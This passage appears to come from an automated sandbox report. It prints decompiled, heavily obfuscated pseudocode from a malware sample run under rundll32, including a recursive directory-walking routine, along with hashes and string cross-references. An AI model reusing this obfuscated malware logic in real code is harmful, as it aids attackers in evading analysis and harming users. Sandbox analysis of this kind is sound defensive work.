				_v1080 = _v1080 ^ 0x00000c75;
				_v1112 = 0xcb8d;
				_v1112 = _v1112 + 0x5361;
				_v1112 = _v1112 + 0xffffff0c;
				_v1112 = _v1112 ^ 0x00015b8c;
				_v1064 = 0xba20;
				_v1064 = _v1064 ^ 0x3b22f3f3;
				_v1064 = _v1064 ^ 0x3b2222af;
				_v1116 = 0xa287;
				_v1116 = _v1116 + 0x9065;
				_t253 = 0x5f;
				_v1116 = _v1116 / _t253;
				_v1116 = _v1116 + 0xffff8b94;
				_v1116 = _v1116 ^ 0xffffc056;
				_t238 = E00B385BA(_t253);
				do {
					while(_t286 != 0x2b67e243) {
						if(_t286 == 0x35036a43) {
							_push( &_v1040);
							_push( &_v520);
							return E00B27B63(_v1064, _v1116, __eflags);
						}
						if(_t286 == 0x35c963e4) {
							_t286 = 0x39b3b44d;
							continue;
						}
						_t295 = _t286 - 0x39b3b44d;
						if(_t286 != 0x39b3b44d) {
							goto L8;
						}
						_push(_v1092);
						_t245 = E00B3889D(0xb3c9b0, _v1052, _t295);
						_pop(_t264);
						_t282 =  *0xb3ca2c; // 0x505cc8
						_t196 = _t282 + 0x230; // 0x6c0053
						E00B2C680(_t196, _v1096, _v1136, _t264, _v1104,  *0xb3ca2c, _t245,  &_v520);
						_t238 = E00B32025(_v1144, _t245, _v1108, _v1120);
						_t290 =  &(_t290[9]);
						_t286 = 0x2b67e243;
					}
					_push(_v1076);
					_t239 = E00B3889D(0xb3c980, _v1088, __eflags);
					_t240 = E00B38C8F(_v1056);
					_t258 =  *0xb3ca2c; // 0x505cc8
					_t210 = _t258 + 0x230; // 0x505ef8
					E00B229E3(_t210, 0x104, _t239, _v1124, _v1132, _v1140, _t240,  &_v1040, _v1100, _v1084);
					_t238 = E00B32025(_v1072, _t239, _v1080, _v1112);
					_t290 =  &(_t290[0xc]);
					_t286 = 0x35036a43;
					L8:
					__eflags = _t286 - 0x38d0088b;
				} while (__eflags != 0);
				return _t238;
			}

0x00b38f49
0x00b38f4f
0x00b38f56
0x00b38f5e
0x00b38f66
0x00b38f78
0x00b38f7d
0x00b38f83
0x00b38f88
0x00b38f8d
0x00b38f95
0x00b38f9d
0x00b38fa5
0x00b38fad
0x00b38fb5
0x00b38fc2
0x00b38fca
0x00b38fd2
0x00b38fda
0x00b38fe2
0x00b38fea
0x00b38fef
0x00b38ff7
0x00b38fff
0x00b3900c
0x00b3900d
0x00b39011
0x00b39019
0x00b3901e
0x00b39026
0x00b3902e
0x00b39038
0x00b3903c
0x00b39044
0x00b3904c
0x00b3905a
0x00b3905e
0x00b39066
0x00b3906e
0x00b39076
0x00b39083
0x00b39087
0x00b3908f
0x00b39097
0x00b3909f
0x00b390a9
0x00b390ad
0x00b390b5
0x00b390bd
0x00b390c5
0x00b390cd
0x00b390d5
0x00b390dd
0x00b390e5
0x00b390ed
0x00b390f5
0x00b390fd
0x00b39105
0x00b3910a
0x00b39112
0x00b3911f
0x00b39123
0x00b3912b
0x00b39133
0x00b3913d
0x00b39145
0x00b3914a
0x00b39155
0x00b3915a
0x00b39160
0x00b39168
0x00b39175
0x00b39178
0x00b39181
0x00b39185
0x00b3918a
0x00b39192
0x00b3919a
0x00b3919f
0x00b391a7
0x00b391af
0x00b391b7
0x00b391bf
0x00b391c7
0x00b391d7
0x00b391df
0x00b391ef
0x00b391f3
0x00b391fb
0x00b39203
0x00b3920b
0x00b39213
0x00b3921b
0x00b39223
0x00b3922b
0x00b39233
0x00b3923b
0x00b39247
0x00b3924a
0x00b3924e
0x00b39256
0x00b39262
0x00b39276
0x00b39276
0x00b39280
0x00b3938d
0x00b39395
0x00000000
0x00b3939c
0x00b3928c
0x00b392fc
0x00000000
0x00b392fc
0x00b3928e
0x00b39290
0x00000000
0x00000000
0x00b39296
0x00b392a3
0x00b392a8
0x00b392c7
0x00b392d4
0x00b392da
0x00b392ed
0x00b392f2
0x00b392f5
0x00b392f5
0x00b39303
0x00b39310
0x00b3931f
0x00b39341
0x00b3934d
0x00b39353
0x00b39369
0x00b3936e
0x00b39371
0x00b39373
0x00b39373
0x00b39373
0x00000000

Strings

kI, xrefs: 00B3903C
E/, xrefs: 00B38FCA
_r*, xrefs: 00B3918A
Cg+, xrefs: 00B39267
e, xrefs: 00B390CD
aS, xrefs: 00B39203
;, xrefs: 00B391D7
_r*, xrefs: 00B3917C, 00B39170
m, xrefs: 00B38FE2
y, xrefs: 00B39192

Memory Dump Source

Source File: 00000007.00000002.2107903712.0000000000B21000.00000020.00000001.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000007.00000002.2107895117.0000000000B20000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2107924836.0000000000B3C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_b20000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: e$m$Cg+$E/$_r*$_r*$aS$kI$;$y
API String ID: 0-1402005448
Opcode ID: 76ac66a97b82fe8444693a309ac4fd11d2d4b7ebf1e937f2155c5fe5c78084bf
Instruction ID: 7ef50f8c1863cbe3255e37139d0278d31a60496581435a562a9141d6df86336a
Opcode Fuzzy Hash: 76ac66a97b82fe8444693a309ac4fd11d2d4b7ebf1e937f2155c5fe5c78084bf
Instruction Fuzzy Hash: 00B1327150D3819FD358CF64C58A50BFBE1FBC8798F208A1DF195962A0C7B98A49CF86

Uniqueness

Uniqueness Score: -1.00%

Function 00B31773, Relevance: 12.6, Strings: 10, Instructions: 147
COMMONCrypto

Download Yara Rule

C-Code - Quality: 90%

			E00B31773(void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v4;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				void* __ecx;
				void* _t131;
				void* _t148;
				void* _t151;
				signed int _t162;
				void* _t164;
				signed int* _t167;

				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				E00B2602B(_t131);
				_v32 = 0x943f;
				_t167 =  &(( &_v64)[6]);
				_t164 = 0;
				_t151 = 0x349de80e;
				_t162 = 0x48;
				_v32 = _v32 * 0x69;
				_v32 = _v32 ^ 0x003ccdd6;
				_v56 = 0x5d22;
				_v56 = _v56 << 0xb;
				_v56 = _v56 * 0x6c;
				_v56 = _v56 >> 0xc;
				_v56 = _v56 ^ 0x0003a52d;
				_v48 = 0xb9ad;
				_v48 = _v48 / _t162;
				_v48 = _v48 | 0x8e45101b;
				_v48 = _v48 ^ 0xce45129f;
				_v16 = 0x4535;
				_v16 = _v16 + 0xffff440f;
				_v16 = _v16 ^ 0xbfff8944;
				_v24 = 0xd710;
				_v24 = _v24 << 4;
				_v24 = _v24 ^ 0x000d4c75;
				_v44 = 0x65fd;
				_v44 = _v44 >> 2;
				_v44 = _v44 | 0x32207922;
				_v44 = _v44 ^ 0x322078de;
				_v28 = 0xded8;
				_v28 = _v28 ^ 0x86a01735;
				_v28 = _v28 ^ 0x86a0c6d1;
				_v64 = 0xdb93;
				_v64 = _v64 + 0x597e;
				_v64 = _v64 << 0xa;
				_v64 = _v64 << 0xa;
				_v64 = _v64 ^ 0x5110354e;
				_v60 = 0x2ada;
				_v60 = _v60 | 0x1c3e2a8f;
				_v60 = _v60 + 0xf49a;
				_v60 = _v60 ^ 0xe6209c52;
				_v60 = _v60 ^ 0xfa1f8dfc;
				_v20 = 0xdaa6;
				_v20 = _v20 + 0xb461;
				_v20 = _v20 ^ 0x0001dcca;
				_v40 = 0x4872;
				_v40 = _v40 >> 0xe;
				_v40 = _v40 ^ 0xb451885a;
				_v40 = _v40 ^ 0xb451b970;
				_v36 = 0x262e;
				_v36 = _v36 >> 0xf;
				_v36 = _v36 + 0x6428;
				_v36 = _v36 ^ 0x00003c11;
				_v8 = 0x6e80;
				_v8 = _v8 << 0xc;
				_v8 = _v8 ^ 0x06e82b80;
				_v12 = 0x3e9d;
				_v12 = _v12 >> 3;
				_v12 = _v12 ^ 0x00005153;
				_v52 = 0x8462;
				_v52 = _v52 ^ 0xcdf70fa2;
				_v52 = _v52 ^ 0xe5a9b23c;
				_v52 = _v52 | 0x26296c1d;
				_v52 = _v52 ^ 0x2e7f2e4a;
				do {
					while(_t151 != 0x6cb1230) {
						if(_t151 == 0x944062a) {
							_push(_t151);
							_push(_t151);
							_t164 = E00B28736(_v4 + _v4);
							if(_t164 != 0) {
								_t151 = 0x6cb1230;
								continue;
							}
						} else {
							if(_t151 == 0x30a4ce3e) {
								_t148 = E00B377A3(_a4,  &_v4, _v24, _v44, _a8, _v28, 0, _v64, _v48 | _v32);
								_t167 =  &(_t167[7]);
								if(_t148 != 0) {
									_t151 = 0x944062a;
									continue;
								}
							} else {
								if(_t151 != 0x349de80e) {
									goto L11;
								} else {
									_t151 = 0x30a4ce3e;
									continue;
								}
							}
						}
						goto L12;
					}
					E00B377A3(_a4,  &_v4, _v36, _v8, _a8, _v12, _t164, _v52, _v16 | _v56);
					_t167 =  &(_t167[7]);
					_t151 = 0x222ae378;
					L11:
				} while (_t151 != 0x222ae378);
				L12:
				return _t164;
			}

0x00b3177a
0x00b3177e
0x00b31782
0x00b31786
0x00b3178a
0x00b3178c
0x00b31791
0x00b31799
0x00b317a3
0x00b317a5
0x00b317b6
0x00b317b7
0x00b317bb
0x00b317c3
0x00b317cb
0x00b317d5
0x00b317d9
0x00b317de
0x00b317e6
0x00b317f9
0x00b317fd
0x00b31805
0x00b3180d
0x00b31815
0x00b3181d
0x00b31825
0x00b3182d
0x00b31832
0x00b3183a
0x00b31842
0x00b31847
0x00b3184f
0x00b31857
0x00b3185f
0x00b31867
0x00b3186f
0x00b31877
0x00b3187f
0x00b31884
0x00b31889
0x00b31891
0x00b31899
0x00b318a1
0x00b318a9
0x00b318b1
0x00b318b9
0x00b318c1
0x00b318c9
0x00b318d1
0x00b318d9
0x00b318de
0x00b318e6
0x00b318ee
0x00b318f6
0x00b318fb
0x00b31903
0x00b3190b
0x00b31913
0x00b31918
0x00b31920
0x00b31928
0x00b3192d
0x00b31935
0x00b3193d
0x00b31945
0x00b3194d
0x00b31955
0x00b3195d
0x00b3195d
0x00b31963
0x00b319c0
0x00b319c1
0x00b319ca
0x00b319d0
0x00b319d2
0x00000000
0x00b319d2
0x00b31965
0x00b31967
0x00b319a0
0x00b319a5
0x00b319aa
0x00b319ac
0x00000000
0x00b319ac
0x00b31969
0x00b3196f
0x00000000
0x00b31975
0x00b31975
0x00000000
0x00b31975
0x00b3196f
0x00b31967
0x00000000
0x00b31963
0x00b319fc
0x00b31a01
0x00b31a04
0x00b31a09
0x00b31a09
0x00b31a16
0x00b31a1e

Strings

rH, xrefs: 00B318D1
x*", xrefs: 00B31A09
SQ, xrefs: 00B3192D
~Y, xrefs: 00B31877
(d, xrefs: 00B318FB
"], xrefs: 00B317C3
5E, xrefs: 00B3180D
x*", xrefs: 00B31A04
"y 2, xrefs: 00B31847
uL, xrefs: 00B31832

Memory Dump Source

Source File: 00000007.00000002.2107903712.0000000000B21000.00000020.00000001.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000007.00000002.2107895117.0000000000B20000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2107924836.0000000000B3C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_b20000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: "]$"y 2$(d$5E$SQ$rH$uL$x*"$x*"$~Y
API String ID: 0-656425227
Opcode ID: e7280d44e7a884410bcaec10a4673638d73f0fd9bd229187a27b5946fca426a3
Instruction ID: 2f5e93112581407a44fb1fb26d9e6e7923195df73891e857d47be98af0b8dc11
Opcode Fuzzy Hash: e7280d44e7a884410bcaec10a4673638d73f0fd9bd229187a27b5946fca426a3
Instruction Fuzzy Hash: 46611F711093819FD358CF64C89992BBBE5FB95788F204E1DF69696260C3B5CA09CF83

Uniqueness

Uniqueness Score: -1.00%

Function 00B32B16, Relevance: 11.6, Strings: 9, Instructions: 329
COMMONCrypto

Download Yara Rule

C-Code - Quality: 83%

			E00B32B16(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, signed int _a16, intOrPtr _a20) {
				char _v520;
				char _v1040;
				short _v1584;
				short _v1586;
				char _v1588;
				signed int _v1632;
				signed int _v1636;
				unsigned int _v1640;
				signed int _v1644;
				signed int _v1648;
				signed int _v1652;
				signed int _v1656;
				signed int _v1660;
				signed int _v1664;
				signed int _v1668;
				signed int _v1672;
				signed int _v1676;
				signed int _v1680;
				signed int _v1684;
				signed int _v1688;
				signed int _v1692;
				signed int _v1696;
				unsigned int _v1700;
				signed int _v1704;
				signed int _v1708;
				signed int _v1712;
				signed int _v1716;
				signed int _v1720;
				signed int _v1724;
				signed int _v1728;
				signed int _v1732;
				signed int _v1736;
				signed int _v1740;
				signed int _v1744;
				signed int _v1748;
				signed int _v1752;
				signed int _v1756;
				signed int _v1760;
				void* __edx;
				void* _t314;
				signed int _t340;
				signed int _t342;
				signed int _t346;
				void* _t348;
				void* _t354;
				signed int _t358;
				void* _t360;
				void* _t389;
				signed int _t400;
				signed int _t401;
				signed int _t402;
				signed int _t403;
				signed int _t404;
				void* _t408;
				void* _t409;

				_push(_a20);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E00B2602B(_t314);
				_v1672 = 0x92f4;
				_t409 = _t408 + 0x1c;
				_t354 = 0x3181563a;
				_t400 = 0x5d;
				_v1672 = _v1672 / _t400;
				_v1672 = _v1672 ^ 0xa72c55b3;
				_v1672 = _v1672 ^ 0xa72c5437;
				_v1736 = 0x461f;
				_v1736 = _v1736 + 0xd353;
				_v1736 = _v1736 + 0xffff7400;
				_v1736 = _v1736 + 0xffff12e8;
				_v1736 = _v1736 ^ 0xffffeb08;
				_v1684 = 0x12ca;
				_v1684 = _v1684 + 0xffffbd30;
				_v1684 = _v1684 + 0xc084;
				_v1684 = _v1684 ^ 0x00009b25;
				_v1700 = 0x68fe;
				_v1700 = _v1700 >> 0x10;
				_v1700 = _v1700 >> 0xf;
				_v1700 = _v1700 ^ 0x000058ac;
				_v1676 = 0xc4c1;
				_v1676 = _v1676 + 0x377e;
				_v1676 = _v1676 + 0xffff6b29;
				_v1676 = _v1676 ^ 0x0000377c;
				_v1708 = 0x7055;
				_v1708 = _v1708 << 0xe;
				_v1708 = _v1708 ^ 0x1eb23ae3;
				_v1708 = _v1708 ^ 0x02a72f08;
				_v1648 = 0x750a;
				_v1648 = _v1648 | 0xec573941;
				_v1648 = _v1648 ^ 0xec5707ed;
				_v1744 = 0xfcbf;
				_t401 = 0x2c;
				_v1744 = _v1744 * 0x3d;
				_v1744 = _v1744 >> 0xd;
				_v1744 = _v1744 / _t401;
				_v1744 = _v1744 ^ 0x00003058;
				_v1636 = 0x9933;
				_v1636 = _v1636 << 3;
				_v1636 = _v1636 ^ 0x0004b1ef;
				_v1668 = 0xb76d;
				_v1668 = _v1668 | 0xef4f757f;
				_v1668 = _v1668 ^ 0xef4ff671;
				_v1656 = 0xf145;
				_v1656 = _v1656 + 0x1194;
				_v1656 = _v1656 ^ 0x00010bb0;
				_v1752 = 0xf3e9;
				_t402 = 0x49;
				_v1752 = _v1752 / _t402;
				_v1752 = _v1752 + 0x9c03;
				_v1752 = _v1752 + 0xffffb211;
				_v1752 = _v1752 ^ 0x000027fb;
				_v1728 = 0x648a;
				_v1728 = _v1728 ^ 0x1010be16;
				_v1728 = _v1728 * 0x14;
				_v1728 = _v1728 | 0x258edfa9;
				_v1728 = _v1728 ^ 0x65dfe7b9;
				_v1688 = 0x4eab;
				_v1688 = _v1688 << 0xa;
				_v1688 = _v1688 | 0x3ca08384;
				_v1688 = _v1688 ^ 0x3dba9eb2;
				_v1756 = 0xd2f4;
				_t403 = 0x23;
				_v1756 = _v1756 / _t403;
				_v1756 = _v1756 ^ 0xcde225b2;
				_t404 = 0x6e;
				_v1756 = _v1756 / _t404;
				_v1756 = _v1756 ^ 0x01df76bd;
				_v1760 = 0x6cd1;
				_v1760 = _v1760 * 0x7d;
				_v1760 = _v1760 ^ 0x8e200a23;
				_v1760 = _v1760 >> 3;
				_v1760 = _v1760 ^ 0x11c2d811;
				_v1640 = 0xac3a;
				_v1640 = _v1640 >> 3;
				_v1640 = _v1640 ^ 0x00004856;
				_v1748 = 0x4fc2;
				_v1748 = _v1748 >> 0xf;
				_v1748 = _v1748 * 0x31;
				_v1748 = _v1748 ^ 0x38a83a44;
				_v1748 = _v1748 ^ 0x38a82be9;
				_v1680 = 0xb86a;
				_v1680 = _v1680 | 0x02231922;
				_v1680 = _v1680 + 0xaf06;
				_v1680 = _v1680 ^ 0x022411a2;
				_v1644 = 0x3f39;
				_v1644 = _v1644 + 0xffff5bb9;
				_v1644 = _v1644 ^ 0xffffc632;
				_v1692 = 0xc5f9;
				_v1692 = _v1692 ^ 0xaafe79bc;
				_v1692 = _v1692 >> 0xf;
				_v1692 = _v1692 ^ 0x00013e0d;
				_v1740 = 0x58ed;
				_v1740 = _v1740 + 0xffff3fce;
				_v1740 = _v1740 * 0x34;
				_v1740 = _v1740 * 0x49;
				_v1740 = _v1740 ^ 0xfa04971a;
				_v1696 = 0xcc7a;
				_v1696 = _v1696 >> 4;
				_v1696 = _v1696 << 1;
				_v1696 = _v1696 ^ 0x00000d26;
				_v1732 = 0xc33a;
				_v1732 = _v1732 | 0xb66c57ae;
				_v1732 = _v1732 >> 5;
				_v1732 = _v1732 * 0x56;
				_v1732 = _v1732 ^ 0xea449beb;
				_v1712 = 0xdae0;
				_v1712 = _v1712 >> 0xc;
				_v1712 = _v1712 ^ 0xc13d67df;
				_v1712 = _v1712 ^ 0xc13d455b;
				_v1716 = 0x5478;
				_v1716 = _v1716 | 0xa382055d;
				_v1716 = _v1716 * 0x26;
				_v1716 = _v1716 ^ 0x4558c259;
				_v1720 = 0xeafc;
				_v1720 = _v1720 + 0xffff5250;
				_v1720 = _v1720 ^ 0x4a0f2ed9;
				_v1720 = _v1720 ^ 0x4a0f1f8c;
				_v1664 = 0x8e28;
				_v1664 = _v1664 ^ 0x7b061f8d;
				_v1664 = _v1664 + 0xffffa0ec;
				_v1664 = _v1664 ^ 0x7b062de0;
				_v1724 = 0xce31;
				_v1724 = _v1724 << 0xe;
				_v1724 = _v1724 << 7;
				_v1724 = _v1724 << 5;
				_v1724 = _v1724 ^ 0xc4004273;
				_v1704 = 0xa554;
				_v1704 = _v1704 << 5;
				_v1704 = _v1704 * 0x35;
				_v1704 = _v1704 ^ 0x04475614;
				_v1660 = 0xb9dc;
				_v1660 = _v1660 + 0x9e03;
				_v1660 = _v1660 ^ 0x00011a8b;
				_v1652 = 0xf227;
				_t399 = _v1660;
				_v1652 = _v1652 / _t404;
				_v1652 = _v1652 ^ 0x00007d1f;
				while(1) {
					L1:
					_t389 = 0x2e;
					L2:
					while(_t354 != 0x2ecc014) {
						if(_t354 == 0xf8b22d1) {
							__eflags = _v1632 & _v1672;
							if(__eflags == 0) {
								_t340 = _a8( &_v1632, _a20);
								asm("sbb ecx, ecx");
								_t358 =  ~_t340 & 0x1c386f3a;
								L13:
								_t354 = _t358 + 0x2ecc014;
								while(1) {
									L1:
									_t389 = 0x2e;
									goto L2;
								}
							}
							__eflags = _v1588 - _t389;
							if(_v1588 != _t389) {
								L20:
								__eflags = _a16;
								if(__eflags != 0) {
									_push(_v1760);
									_t348 = E00B3889D(0xb3c0b0, _v1756, __eflags);
									_pop(_t360);
									E00B2C680( &_v1588, _v1748, _v1680, _t360, _v1644, _a4, _t348,  &_v520);
									E00B32B16(_v1692,  &_v520, _a8, _v1696, _a16, _a20);
									_t409 = _t409 + 0x30;
									_t346 = E00B32025(_v1732, _t348, _v1712, _v1716);
									_t389 = 0x2e;
								}
								L19:
								_t354 = 0x1f252f4e;
								continue;
							}
							__eflags = _v1586;
							if(__eflags == 0) {
								goto L19;
							}
							__eflags = _v1586 - _t389;
							if(_v1586 != _t389) {
								goto L20;
							}
							__eflags = _v1584;
							if(__eflags != 0) {
								goto L20;
							}
							goto L19;
						}
						if(_t354 == 0x1f252f4e) {
							_t342 = E00B2595A(_v1720, _t399,  &_v1632, _v1664);
							asm("sbb ecx, ecx");
							_t358 =  ~_t342 & 0x0c9e62bd;
							__eflags = _t358;
							goto L13;
						}
						if(_t354 == 0x21983c19) {
							_push(_v1684);
							E00B37BAF(__eflags,  &_v1040, _v1676, _a4, _v1708, _v1648, E00B3889D(0xb3c090, _v1736, __eflags));
							_t346 = E00B32025(_v1744, _t343, _v1636, _v1668);
							_t409 = _t409 + 0x20;
							_t354 = 0x3298743a;
							while(1) {
								L1:
								_t389 = 0x2e;
								goto L2;
							}
						}
						if(_t354 == 0x3181563a) {
							_t354 = 0x21983c19;
							continue;
						}
						if(_t354 != 0x3298743a) {
							L24:
							__eflags = _t354 - 0x2a8aa181;
							if(__eflags != 0) {
								continue;
							}
							L25:
							return _t346;
						}
						_t346 = E00B2109C(_v1656,  &_v1040,  &_v1632, _v1752, _v1728, _v1688);
						_t399 = _t346;
						_t409 = _t409 + 0x10;
						if(_t346 == 0xffffffff) {
							goto L25;
						}
						_t354 = 0xf8b22d1;
						goto L1;
					}
					E00B21B5C(_v1724, _v1704, _v1660, _t399, _v1652);
					_t409 = _t409 + 0xc;
					_t354 = 0x2a8aa181;
					_t389 = 0x2e;
					goto L24;
				}
			}

0x00b32b1f
0x00b32b26
0x00b32b2d
0x00b32b34
0x00b32b3b
0x00b32b43
0x00b32b44
0x00b32b49
0x00b32b54
0x00b32b5d
0x00b32b64
0x00b32b69
0x00b32b6f
0x00b32b77
0x00b32b7f
0x00b32b87
0x00b32b8f
0x00b32b97
0x00b32b9f
0x00b32ba7
0x00b32baf
0x00b32bb7
0x00b32bbf
0x00b32bc7
0x00b32bcf
0x00b32bd4
0x00b32bd9
0x00b32be1
0x00b32be9
0x00b32bf1
0x00b32bf9
0x00b32c01
0x00b32c09
0x00b32c0e
0x00b32c16
0x00b32c1e
0x00b32c29
0x00b32c34
0x00b32c3f
0x00b32c4c
0x00b32c4f
0x00b32c53
0x00b32c60
0x00b32c64
0x00b32c6c
0x00b32c77
0x00b32c7f
0x00b32c8a
0x00b32c92
0x00b32c9a
0x00b32ca2
0x00b32caa
0x00b32cb2
0x00b32cba
0x00b32cc6
0x00b32cc9
0x00b32ccd
0x00b32cd5
0x00b32cdd
0x00b32ce5
0x00b32ced
0x00b32cfa
0x00b32cfe
0x00b32d06
0x00b32d10
0x00b32d18
0x00b32d1d
0x00b32d25
0x00b32d2d
0x00b32d3b
0x00b32d40
0x00b32d46
0x00b32d52
0x00b32d55
0x00b32d59
0x00b32d61
0x00b32d6e
0x00b32d72
0x00b32d7a
0x00b32d7f
0x00b32d87
0x00b32d92
0x00b32d9a
0x00b32da5
0x00b32dad
0x00b32db7
0x00b32dbb
0x00b32dc3
0x00b32dcb
0x00b32dd3
0x00b32ddb
0x00b32de3
0x00b32deb
0x00b32df6
0x00b32e01
0x00b32e0c
0x00b32e14
0x00b32e1c
0x00b32e21
0x00b32e29
0x00b32e31
0x00b32e3e
0x00b32e47
0x00b32e4b
0x00b32e53
0x00b32e5b
0x00b32e60
0x00b32e64
0x00b32e6c
0x00b32e74
0x00b32e7c
0x00b32e86
0x00b32e8a
0x00b32e92
0x00b32e9a
0x00b32e9f
0x00b32ea7
0x00b32eaf
0x00b32eb7
0x00b32ec4
0x00b32ec8
0x00b32ed0
0x00b32ed8
0x00b32ee0
0x00b32ee8
0x00b32ef0
0x00b32ef8
0x00b32f00
0x00b32f08
0x00b32f10
0x00b32f18
0x00b32f1f
0x00b32f29
0x00b32f2e
0x00b32f36
0x00b32f3e
0x00b32f48
0x00b32f4c
0x00b32f54
0x00b32f5c
0x00b32f64
0x00b32f6c
0x00b32f7a
0x00b32f7e
0x00b32f82
0x00b32f8a
0x00b32f8a
0x00b32f8c
0x00000000
0x00b32f8d
0x00b32f9f
0x00b330a3
0x00b330aa
0x00b33193
0x00b3319e
0x00b331a0
0x00b33094
0x00b33094
0x00b32f8a
0x00b32f8a
0x00b32f8c
0x00000000
0x00b32f8c
0x00b32f8a
0x00b330b0
0x00b330b8
0x00b330e1
0x00b330e1
0x00b330e9
0x00b330eb
0x00b330f8
0x00b330fd
0x00b3312e
0x00b3315f
0x00b33164
0x00b33175
0x00b3317e
0x00b3317e
0x00b330da
0x00b330da
0x00000000
0x00b330da
0x00b330ba
0x00b330c3
0x00000000
0x00000000
0x00b330c5
0x00b330cd
0x00000000
0x00000000
0x00b330cf
0x00b330d8
0x00000000
0x00000000
0x00000000
0x00b330d8
0x00b32fa7
0x00b33081
0x00b3308c
0x00b3308e
0x00b3308e
0x00000000
0x00b3308e
0x00b32fb3
0x00b3300c
0x00b33044
0x00b3305d
0x00b33062
0x00b33065
0x00b32f8a
0x00b32f8a
0x00b32f8c
0x00000000
0x00b32f8c
0x00b32f8a
0x00b32fbb
0x00b33005
0x00000000
0x00b33005
0x00b32fc3
0x00b331cc
0x00b331cc
0x00b331d2
0x00000000
0x00000000
0x00b331e1
0x00b331e1
0x00b331e1
0x00b32feb
0x00b32ff0
0x00b32ff2
0x00b32ff8
0x00000000
0x00000000
0x00b32ffe
0x00000000
0x00b32ffe
0x00b331bc
0x00b331c1
0x00b331c4
0x00b331cb
0x00000000
0x00b331cb

Strings

A9W, xrefs: 00B32C29
&, xrefs: 00B32E64
Up, xrefs: 00B32C01
VH, xrefs: 00B32D9A
sB, xrefs: 00B32F2E
9?, xrefs: 00B32DEB
xT, xrefs: 00B32EAF
X, xrefs: 00B32E29
|7, xrefs: 00B32BF9

Memory Dump Source

Source File: 00000007.00000002.2107903712.0000000000B21000.00000020.00000001.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000007.00000002.2107895117.0000000000B20000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2107924836.0000000000B3C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_b20000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: &$9?$A9W$Up$VH$sB$xT$|7$X
API String ID: 0-983689062
Opcode ID: bafb849a08aae09cec38183b1c20511176d816ec5c8339f7d7a062aca1047500
Instruction ID: 51f1a0fcf994338e62485785a5b23ad7c19465b821f2b4cd7002dc9c09f91ca0
Opcode Fuzzy Hash: bafb849a08aae09cec38183b1c20511176d816ec5c8339f7d7a062aca1047500
Instruction Fuzzy Hash: E1F112715083819FD368CF65C549A5FFBE1FBC4708F208A1DF29A862A0D7B58949CF42

Uniqueness

Uniqueness Score: -1.00%

Function 00B288E5, Relevance: 11.5, Strings: 9, Instructions: 298
COMMONCrypto

Download Yara Rule

C-Code - Quality: 99%

			E00B288E5(intOrPtr __ecx, intOrPtr* __edx) {
				intOrPtr _t325;
				short* _t331;
				signed int _t340;
				signed int _t341;
				signed int _t342;
				signed int _t343;
				short _t373;
				void* _t376;
				intOrPtr* _t380;
				void* _t382;

				 *(_t382 + 8) = 0xaa86;
				 *(_t382 + 8) =  *(_t382 + 8) + 0xffffe070;
				 *(_t382 + 8) =  *(_t382 + 8) << 0xc;
				 *(_t382 + 8) =  *(_t382 + 8) << 6;
				 *(_t382 + 8) =  *(_t382 + 8) ^ 0x2bd80002;
				 *(_t382 + 0x64) = 0xdd5d;
				 *(_t382 + 0x64) =  *(_t382 + 0x64) ^ 0x3d690a55;
				 *(_t382 + 0x64) =  *(_t382 + 0x64) ^ 0x3d69d718;
				 *(_t382 + 0x74) = 0x57af;
				_t380 = __edx;
				 *((intOrPtr*)(_t382 + 0x9c)) = __ecx;
				_t373 = 0;
				_t340 = 5;
				 *(_t382 + 0x88) =  *(_t382 + 0x74) / _t340;
				 *(_t382 + 0x88) =  *(_t382 + 0x88) ^ 0x40001189;
				_t376 = 0x1f5a6ea2;
				 *(_t382 + 0x68) = 0xf929;
				 *(_t382 + 0x68) =  *(_t382 + 0x68) ^ 0xb70a9a6f;
				 *(_t382 + 0x68) =  *(_t382 + 0x68) ^ 0xb70a6fd1;
				 *(_t382 + 0x74) = 0x8254;
				 *(_t382 + 0x74) =  *(_t382 + 0x74) << 2;
				 *(_t382 + 0x74) =  *(_t382 + 0x74) ^ 0x00022a5c;
				 *(_t382 + 0x48) = 0x274c;
				_t341 = 0x4c;
				 *(_t382 + 0x48) =  *(_t382 + 0x48) * 0x48;
				 *(_t382 + 0x48) =  *(_t382 + 0x48) ^ 0x4b411b57;
				 *(_t382 + 0x48) =  *(_t382 + 0x48) ^ 0x4b4a2351;
				 *(_t382 + 0x7c) = 0x6684;
				 *(_t382 + 0x7c) =  *(_t382 + 0x7c) + 0xaed9;
				 *(_t382 + 0x7c) =  *(_t382 + 0x7c) ^ 0x00014ccf;
				 *(_t382 + 0x40) = 0x1902;
				 *(_t382 + 0x40) =  *(_t382 + 0x40) ^ 0x72d0747c;
				 *(_t382 + 0x40) =  *(_t382 + 0x40) / _t341;
				 *(_t382 + 0x40) =  *(_t382 + 0x40) ^ 0x01828d69;
				 *(_t382 + 0x6c) = 0xb89b;
				 *(_t382 + 0x6c) =  *(_t382 + 0x6c) + 0xffffd32a;
				 *(_t382 + 0x6c) =  *(_t382 + 0x6c) ^ 0x0000fcd5;
				 *(_t382 + 0x14) = 0x3892;
				 *(_t382 + 0x14) =  *(_t382 + 0x14) >> 0xa;
				 *(_t382 + 0x14) =  *(_t382 + 0x14) ^ 0x2d57d543;
				 *(_t382 + 0x14) =  *(_t382 + 0x14) + 0x6cb7;
